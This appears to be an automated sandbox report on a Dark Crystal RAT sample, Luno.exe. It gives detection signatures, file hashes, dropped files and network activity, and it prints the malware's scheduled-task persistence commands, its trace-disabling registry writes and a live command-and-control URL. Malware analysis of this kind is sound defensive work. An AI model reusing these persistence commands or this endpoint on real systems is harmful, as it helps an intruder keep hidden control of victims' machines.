File name: Luno.exe

Full analysis: https://app.any.run/tasks/abeecd66-6378-4005-b1f1-622afa22bb50
Verdict: Malicious activity
Threats:

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT) that was first introduced in 2018. It is modular malware that can be customized to perform different tasks: for instance, it can steal passwords and crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.

Analysis date: March 11, 2025, 16:19:47
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: dcrat, rat, remote, darkcrystal
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5: 305DB5A255E9847FFD31AEDAE51F035C
SHA1: EBB636355B511E4C3456FF0D4E82A767701C2877
SHA256: F55813C3AF40669E49A77CEA37D1D303F578EF26A101417CDACF8AC4FC65DA5E
SSDEEP: 49152:HFrKj5G0lvhhneLyiN/aw3R8iUan8/EWLeZXNCJV1x+e7mEgsjN:HFrKdVvpiUan8sv9G9H7DN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is for user acknowledgement. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Uses sleep, probably for detection evasion (SCRIPT)

      • wscript.exe (PID: 7892)
    • DCRAT mutex has been found

      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)
      • services.exe (PID: 2772)
    • DARKCRYSTAL has been detected (SURICATA)

      • services.exe (PID: 2772)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • Luno.exe (PID: 7848)
      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 7892)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7892)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 7892)
    • Executable content was dropped or overwritten

      • Porthost.exe (PID: 8032)
      • Luno.exe (PID: 7848)
      • Porthost.exe (PID: 4008)
    • Executed via WMI

      • schtasks.exe (PID: 4688)
      • schtasks.exe (PID: 5868)
      • schtasks.exe (PID: 7380)
      • schtasks.exe (PID: 8164)
      • schtasks.exe (PID: 4208)
      • schtasks.exe (PID: 7364)
      • schtasks.exe (PID: 1072)
      • schtasks.exe (PID: 5064)
      • schtasks.exe (PID: 7460)
      • schtasks.exe (PID: 5972)
      • schtasks.exe (PID: 7420)
      • schtasks.exe (PID: 7448)
      • schtasks.exe (PID: 728)
      • schtasks.exe (PID: 7708)
      • schtasks.exe (PID: 7516)
      • schtasks.exe (PID: 7728)
      • schtasks.exe (PID: 7488)
      • schtasks.exe (PID: 7332)
      • schtasks.exe (PID: 6032)
      • schtasks.exe (PID: 1132)
      • schtasks.exe (PID: 7012)
      • schtasks.exe (PID: 5892)
      • schtasks.exe (PID: 1180)
      • schtasks.exe (PID: 5404)
      • schtasks.exe (PID: 7184)
      • schtasks.exe (PID: 5504)
      • schtasks.exe (PID: 3768)
      • schtasks.exe (PID: 6112)
      • schtasks.exe (PID: 7084)
      • schtasks.exe (PID: 7228)
      • schtasks.exe (PID: 6744)
      • schtasks.exe (PID: 5720)
      • schtasks.exe (PID: 920)
      • schtasks.exe (PID: 5280)
      • schtasks.exe (PID: 7280)
      • schtasks.exe (PID: 7300)
      • schtasks.exe (PID: 7216)
      • schtasks.exe (PID: 1760)
      • schtasks.exe (PID: 4652)
      • schtasks.exe (PID: 976)
      • schtasks.exe (PID: 7720)
      • schtasks.exe (PID: 7560)
      • schtasks.exe (PID: 7672)
      • schtasks.exe (PID: 7676)
      • schtasks.exe (PID: 7556)
      • schtasks.exe (PID: 5936)
      • schtasks.exe (PID: 7844)
      • schtasks.exe (PID: 7696)
      • schtasks.exe (PID: 7880)
      • schtasks.exe (PID: 4428)
      • schtasks.exe (PID: 6436)
    • The process creates files with name similar to system file names

      • Porthost.exe (PID: 8032)
      • Luno.exe (PID: 7848)
      • Porthost.exe (PID: 4008)
    • Likely accesses (executes) a file from the Public directory

      • schtasks.exe (PID: 7728)
      • schtasks.exe (PID: 7516)
      • schtasks.exe (PID: 7488)
      • schtasks.exe (PID: 3768)
      • schtasks.exe (PID: 6112)
      • schtasks.exe (PID: 7216)
      • schtasks.exe (PID: 5504)
      • schtasks.exe (PID: 976)
      • schtasks.exe (PID: 7720)
      • schtasks.exe (PID: 7084)
      • schtasks.exe (PID: 4428)
      • schtasks.exe (PID: 7184)
    • Reads the date of Windows installation

      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)
    • Application launched itself

      • Porthost.exe (PID: 8032)
    • Starts itself from another location

      • Porthost.exe (PID: 4008)
  • INFO

    • Reads the computer name

      • Luno.exe (PID: 7848)
      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)
      • services.exe (PID: 2772)
    • Drops encrypted VBS script (Microsoft Script Encoder)

      • Luno.exe (PID: 7848)
    • Process checks computer location settings

      • Luno.exe (PID: 7848)
      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)
    • Checks supported languages

      • Luno.exe (PID: 7848)
      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)
      • services.exe (PID: 2772)
    • Reads Environment values

      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)
      • services.exe (PID: 2772)
    • The sample was compiled with English language support

      • Porthost.exe (PID: 8032)
      • Luno.exe (PID: 7848)
      • Porthost.exe (PID: 4008)
    • Reads the machine GUID from the registry

      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)
      • services.exe (PID: 2772)
    • Failed to create an executable file in Windows directory

      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)
    • Creates files in the program directory

      • Porthost.exe (PID: 4008)
    • Reads the software policy settings

      • slui.exe (PID: 7904)
    • Disables trace logs

      • services.exe (PID: 2772)
    • Checks proxy server information

      • services.exe (PID: 2772)
      • slui.exe (PID: 7904)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2020:12:01 18:00:55+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 201216
InitializedDataSize: 255488
UninitializedDataSize: -
EntryPoint: 0x1ec40
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
All screenshots are available in the full report
Total processes: 178
Monitored processes: 60
Malicious processes: 6
Suspicious processes: 0

Behavior graph

(Interactive graph available in the full report.) Process nodes, in order: start, luno.exe, wscript.exe, cmd.exe, conhost.exe, porthost.exe (#DCRAT), schtasks.exe (repeated), porthost.exe (#DCRAT), schtasks.exe (repeated), services.exe (#DARKCRYSTAL), svchost.exe, slui.exe.

Process information

PID: 728
CMD: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Desktop\Idle.exe'" /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 920
CMD: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\bridgecontainerCrtnet\csrss.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 976
CMD: schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Documents\My Videos\SearchApp.exe'" /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1072
CMD: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Users\admin\Favorites\Links\fontdrvhost.exe'" /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1132
CMD: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\bridgecontainerCrtnet\spoolsv.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1180
CMD: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\bridgecontainerCrtnet\csrss.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1760
CMD: schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 11 /tr "'C:\bridgecontainerCrtnet\dasHost.exe'" /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2196
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 2772
CMD: "C:\bridgecontainerCrtnet\services.exe"
Path: C:\bridgecontainerCrtnet\services.exe
Parent process: Porthost.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\bridgecontainercrtnet\services.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 3768
CMD: schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\Users\Public\Pictures\dasHost.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 8 017
Read events: 7 999
Write events: 18
Delete events: 0

Modification events

(PID) Process: (7848) Luno.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids
Operation: write
Name: VBEFile
Value:

(PID) Process: (8032) Porthost.exe
Key: HKEY_CURRENT_USER\SOFTWARE\26afce736a6de91186362b839ee521211f876bbb
Operation: write
Name: 2cbc6209724f0e5408f5674defca0a42dd9863d4
Value:
WyJDOlxcYnJpZGdlY29udGFpbmVyQ3J0bmV0XFxQb3J0aG9zdC5leGUiLCJDOlxcYnJpZGdlY29udGFpbmVyQ3J0bmV0XFxSdW50aW1lQnJva2VyLmV4ZSIsIkM6XFxVc2Vyc1xcYWRtaW5cXHNsdWkuZXhlIiwiQzpcXFVzZXJzXFxhZG1pblxcRmF2b3JpdGVzXFxMaW5rc1xcZm9udGRydmhvc3QuZXhlIiwiQzpcXGJyaWRnZWNvbnRhaW5lckNydG5ldFxcc2lob3N0LmV4ZSIsIkM6XFxVc2Vyc1xcRGVmYXVsdFxcRGVza3RvcFxcSWRsZS5leGUiLCJDOlxcVXNlcnNcXFB1YmxpY1xcVmlkZW9zXFxTeXN0ZW0uZXhlIiwiQzpcXGJyaWRnZWNvbnRhaW5lckNydG5ldFxcc3Bvb2xzdi5leGUiXQ==

(PID) Process: (4008) Porthost.exe
Key: HKEY_CURRENT_USER\SOFTWARE\26afce736a6de91186362b839ee521211f876bbb
Operation: write
Name: 2cbc6209724f0e5408f5674defca0a42dd9863d4
Value:
(PID) Process: (2772) services.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\services_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0

(PID) Process: (2772) services.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\services_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value: 0

(PID) Process: (2772) services.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\services_RASAPI32
Operation: write
Name: EnableConsoleTracing
Value: 0

(PID) Process: (2772) services.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\services_RASAPI32
Operation: write
Name: FileTracingMask
Value:

(PID) Process: (2772) services.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\services_RASAPI32
Operation: write
Name: ConsoleTracingMask
Value:

(PID) Process: (2772) services.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\services_RASAPI32
Operation: write
Name: MaxFileSize
Value: 1048576

(PID) Process: (2772) services.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\services_RASAPI32
Operation: write
Name: FileDirectory
Value: %windir%\tracing
Executable files: 18
Suspicious files: 1
Text files: 18
Unknown types: 0

Dropped files

PID: 7848
Process: Luno.exe
Filename: C:\bridgecontainerCrtnet\Porthost.exe
Type: executable
MD5: 81F6BD03EB55DB5C9F3B8E32F52AC261
SHA256: 538600C37369CE1ABC62491E757C070765FAAFA26A013DCE5061D89E5655350E

PID: 8032
Process: Porthost.exe
Filename: C:\Users\admin\a29f4157103644
Type: text
MD5: C0E6B6D49FD1AFF7422AC1E8BBEC8D17
SHA256: 67BBBCF4EBD9E379C1F52E4CD93239AAD4C29CB32FA14BEBD098C3EC8924A144

PID: 8032
Process: Porthost.exe
Filename: C:\Users\admin\Favorites\Links\fontdrvhost.exe
Type: executable
MD5: 81F6BD03EB55DB5C9F3B8E32F52AC261
SHA256: 538600C37369CE1ABC62491E757C070765FAAFA26A013DCE5061D89E5655350E

PID: 8032
Process: Porthost.exe
Filename: C:\Users\admin\slui.exe
Type: executable
MD5: 81F6BD03EB55DB5C9F3B8E32F52AC261
SHA256: 538600C37369CE1ABC62491E757C070765FAAFA26A013DCE5061D89E5655350E

PID: 7848
Process: Luno.exe
Filename: C:\bridgecontainerCrtnet\15DZJy1sJWzJp6BTZUbI23XZpA0v.vbe
Type: binary
MD5: 321AF5B2765FF534A7F88382F26D94E0
SHA256: 132E69761A2757F68056DD494AC49A071FFFA218BA6F18D3FCCFD93B29816FAF

PID: 8032
Process: Porthost.exe
Filename: C:\bridgecontainerCrtnet\9e8d7a4ca61bd9
Type: text
MD5: D2B0690872F7F6182740A7DD4793667D
SHA256: C8CD3CEE07214A5DDDE817658CECD7CF84C8C50A4F170B2A371EC6B311AFC51E

PID: 8032
Process: Porthost.exe
Filename: C:\Users\Default\Desktop\Idle.exe
Type: executable
MD5: 81F6BD03EB55DB5C9F3B8E32F52AC261
SHA256: 538600C37369CE1ABC62491E757C070765FAAFA26A013DCE5061D89E5655350E

PID: 8032
Process: Porthost.exe
Filename: C:\bridgecontainerCrtnet\spoolsv.exe
Type: executable
MD5: 81F6BD03EB55DB5C9F3B8E32F52AC261
SHA256: 538600C37369CE1ABC62491E757C070765FAAFA26A013DCE5061D89E5655350E

PID: 8032
Process: Porthost.exe
Filename: C:\Users\Default\Desktop\6ccacd8608530f
Type: text
MD5: F0BE5DF0A362B1CD9A96BA65F5E0D859
SHA256: 8C0387AA97BE132E588318E120873B662BDBB8ACC9C9410B496675CF59510450

PID: 8032
Process: Porthost.exe
Filename: C:\bridgecontainerCrtnet\f3b6ecef712a24
Type: text
MD5: E10F32E5D55EB4DE9600F2A993B4A604
SHA256: 9AD0DA8A35A722DC3784AD46E9025ABB5EB06D99D6DD6C9BBBAC5A48586A644C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 4
TCP/UDP connections: 19
DNS requests: 6
Threats: 3

HTTP requests

PID: 2772
Process: services.exe
Method: GET
HTTP Code: 400
IP: 141.8.197.42:80
URL: http://a1097913.xsph.ru/a1c6de26.php?3xELc3DtIyQuahx8Soxr1=Djl7QPa&2aqkfsWRTj3Wrh5sE=vZTK2QwsufkfmxSn6zEzCEmAUNy&dfn22ZeBLrhZyw81=y7FEElFoOxqxTzpcRPO1rm&f1742bb50f5b79f28188f3faa38122c0=77fff1d46fd67ec38f7a4edef8f7d53b&375de9cdf10c3d58680d477424411d8f=wY2gTO1IzMwQDM3QzY2Y2NhJmZygTNxIWY1ETZiNjMmdjNxUDN4YmN&3xELc3DtIyQuahx8Soxr1=Djl7QPa&2aqkfsWRTj3Wrh5sE=vZTK2QwsufkfmxSn6zEzCEmAUNy&dfn22ZeBLrhZyw81=y7FEElFoOxqxTzpcRPO1rm
CN: unknown
Reputation: whitelisted

PID: 2772
Process: services.exe
Method: GET
HTTP Code: 400
IP: 141.8.197.42:80
URL: http://a1097913.xsph.ru/a1c6de26.php?3xELc3DtIyQuahx8Soxr1=Djl7QPa&2aqkfsWRTj3Wrh5sE=vZTK2QwsufkfmxSn6zEzCEmAUNy&dfn22ZeBLrhZyw81=y7FEElFoOxqxTzpcRPO1rm&f1742bb50f5b79f28188f3faa38122c0=77fff1d46fd67ec38f7a4edef8f7d53b&375de9cdf10c3d58680d477424411d8f=wY2gTO1IzMwQDM3QzY2Y2NhJmZygTNxIWY1ETZiNjMmdjNxUDN4YmN&3xELc3DtIyQuahx8Soxr1=Djl7QPa&2aqkfsWRTj3Wrh5sE=vZTK2QwsufkfmxSn6zEzCEmAUNy&dfn22ZeBLrhZyw81=y7FEElFoOxqxTzpcRPO1rm
CN: unknown
Reputation: whitelisted

Method: POST
HTTP Code: 500
IP: 40.91.76.224:443
URL: https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
CN: unknown
Type: xml
Size: 512 b
Reputation: whitelisted

Method: POST
HTTP Code: 500
IP: 40.91.76.224:443
URL: https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
CN: unknown
Type: xml
Size: 512 b
Reputation: whitelisted

Connections

IP: 192.168.100.255:138
Reputation: whitelisted

IP: 4.231.128.59:443
Domain: settings-win.data.microsoft.com
ASN: MICROSOFT-CORP-MSN-AS-BLOCK
CN: IE
Reputation: whitelisted

IP: 20.73.194.208:443
Domain: settings-win.data.microsoft.com
ASN: MICROSOFT-CORP-MSN-AS-BLOCK
CN: NL
Reputation: whitelisted

PID: 2772
Process: services.exe
IP: 141.8.197.42:80
Domain: a1097913.xsph.ru
ASN: Sprinthost.ru LLC
CN: RU
Reputation: whitelisted

PID: 7612
Process: slui.exe
IP: 20.83.72.98:443
Domain: activation-v2.sls.microsoft.com
ASN: MICROSOFT-CORP-MSN-AS-BLOCK
CN: US
Reputation: whitelisted

PID: 7904
Process: slui.exe
IP: 20.83.72.98:443
Domain: activation-v2.sls.microsoft.com
ASN: MICROSOFT-CORP-MSN-AS-BLOCK
CN: US
Reputation: whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 20.73.194.208
whitelisted
google.com
  • 142.250.185.206
whitelisted
a1097913.xsph.ru
  • 141.8.197.42
whitelisted
activation-v2.sls.microsoft.com
  • 20.83.72.98
whitelisted

Threats

PID: 2196
Process: svchost.exe
Class: A Network Trojan was detected
Message: MALWARE [ANY.RUN] Suspected domain Associated with Malware Distribution (xsph .ru)

PID: 2196
Process: svchost.exe
Class: Misc activity
Message: ET INFO Observed DNS Query to xsph .ru Domain

PID: 2772
Process: services.exe
Class: A Network Trojan was detected
Message: ET MALWARE DCRAT Activity (GET)
No debug info